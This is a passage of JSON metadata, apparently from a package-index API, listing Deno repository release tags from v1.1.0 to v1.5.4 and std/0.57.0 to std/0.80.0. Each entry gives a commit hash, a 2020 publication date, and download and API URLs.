"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.m